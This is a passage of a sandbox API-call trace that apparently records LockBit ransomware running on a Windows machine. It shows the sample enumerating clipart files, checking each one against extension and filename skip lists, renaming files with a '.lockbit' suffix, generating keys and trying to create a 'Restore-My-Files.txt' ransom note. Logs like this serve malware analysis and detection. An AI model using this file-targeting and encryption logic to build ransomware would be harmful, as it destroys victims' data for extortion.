pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0314068.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.796] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.796] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.796] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5674c1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4b02, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0315580.JPG", cAlternateFileName="")) returned 1 [0158.796] lstrcmpiW (lpString1=".", lpString2="J0315580.JPG") returned -1 [0158.796] lstrcmpiW (lpString1="..", lpString2="J0315580.JPG") returned -1 [0158.796] PathFindExtensionW (pszPath="J0315580.JPG") returned=".JPG" [0158.796] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.796] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.796] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.796] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.796] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.796] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.796] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.796] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.796] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.796] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.797] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.797] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.797] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.797] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.797] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0158.797] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.797] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.797] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.797] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.797] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.797] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.797] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.797] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.797] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.797] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.797] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.797] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.797] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.797] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.797] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.797] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.797] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.798] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0158.798] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.798] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.798] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.798] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.798] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.798] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.798] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.798] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.798] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.798] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.798] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.798] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.798] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.798] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.798] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0315580.JPG") returned 1 [0158.798] lstrcmpiW (lpString1="ntldr", lpString2="J0315580.JPG") returned 1 [0158.798] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0315580.JPG") returned 1 [0158.798] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0315580.JPG") returned -1 [0158.798] lstrcmpiW (lpString1="autorun.inf", lpString2="J0315580.JPG") returned -1 [0158.798] lstrcmpiW (lpString1="thumbs.db", lpString2="J0315580.JPG") returned 1 [0158.798] lstrcmpiW (lpString1="iconcache.db", lpString2="J0315580.JPG") returned -1 [0158.798] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.799] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315580.JPG") returned=".JPG" [0158.799] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.799] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.799] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.799] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.799] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.799] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.799] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.799] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.799] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.799] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.799] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.799] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.799] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.799] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.799] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.799] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.799] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.799] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.799] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.799] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.799] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.799] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.799] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.800] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.800] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.800] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.800] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.800] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.800] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315580.JPG.lockbit") returned 72 [0158.800] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315580.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0315580.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.801] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.801] malloc (_Size=0x40068) returned 0x3df0008 [0158.801] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=19202) returned 1 [0158.801] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.802] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.803] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.809] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315580.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315580.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.809] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.809] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.811] free (_Block=0x1fa2ed8) [0158.811] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315580.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.811] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.812] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.812] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5674c1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x423a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0315612.JPG", cAlternateFileName="")) returned 1 [0158.812] lstrcmpiW (lpString1=".", lpString2="J0315612.JPG") returned -1 [0158.812] lstrcmpiW (lpString1="..", lpString2="J0315612.JPG") returned -1 [0158.812] PathFindExtensionW (pszPath="J0315612.JPG") returned=".JPG" [0158.812] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.812] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.812] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.812] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.812] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.812] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.812] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.812] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.812] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.812] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.812] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.812] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.812] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.812] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.812] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0158.812] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.812] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.812] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.812] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.813] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.813] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.813] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.813] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.813] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.813] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.813] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.813] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.813] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.813] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.813] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.813] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.813] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.814] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.814] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.814] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0315612.JPG") returned 1 [0158.814] lstrcmpiW (lpString1="ntldr", lpString2="J0315612.JPG") returned 1 [0158.814] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0315612.JPG") returned 1 [0158.814] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0315612.JPG") returned -1 [0158.814] lstrcmpiW (lpString1="autorun.inf", lpString2="J0315612.JPG") returned -1 [0158.814] lstrcmpiW (lpString1="thumbs.db", lpString2="J0315612.JPG") returned 1 [0158.814] lstrcmpiW (lpString1="iconcache.db", lpString2="J0315612.JPG") returned -1 [0158.814] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.814] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315612.JPG") returned=".JPG" [0158.814] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.814] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.814] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.814] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.814] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.814] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.814] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.814] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.814] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.814] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.814] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.814] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.814] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.814] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.815] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.815] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.815] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.815] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.815] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.815] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.815] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.815] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.815] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.815] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.815] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.815] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.815] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.815] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.815] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315612.JPG.lockbit") returned 72 [0158.815] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315612.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0315612.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.816] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.816] malloc (_Size=0x40068) returned 0x3df0008 [0158.816] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16954) returned 1 [0158.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.817] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.818] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.822] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315612.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315612.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.822] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.822] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.824] free (_Block=0x1fa2ed8) [0158.824] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315612.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.824] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.824] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.824] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5674c1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4180, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0318448.WMF", cAlternateFileName="")) returned 1 [0158.824] lstrcmpiW (lpString1=".", lpString2="J0318448.WMF") returned -1 [0158.824] lstrcmpiW (lpString1="..", lpString2="J0318448.WMF") returned -1 [0158.824] PathFindExtensionW (pszPath="J0318448.WMF") returned=".WMF" [0158.824] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0158.824] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0158.824] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0158.824] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0158.825] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0158.825] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0318448.WMF") returned 1 [0158.826] lstrcmpiW (lpString1="ntldr", lpString2="J0318448.WMF") returned 1 [0158.826] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0318448.WMF") returned 1 [0158.826] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0318448.WMF") returned -1 [0158.826] lstrcmpiW (lpString1="autorun.inf", lpString2="J0318448.WMF") returned -1 [0158.826] lstrcmpiW (lpString1="thumbs.db", lpString2="J0318448.WMF") returned 1 [0158.826] lstrcmpiW (lpString1="iconcache.db", lpString2="J0318448.WMF") returned -1 [0158.826] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.826] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0318448.WMF") returned=".WMF" [0158.826] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0158.826] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0158.827] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0158.827] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 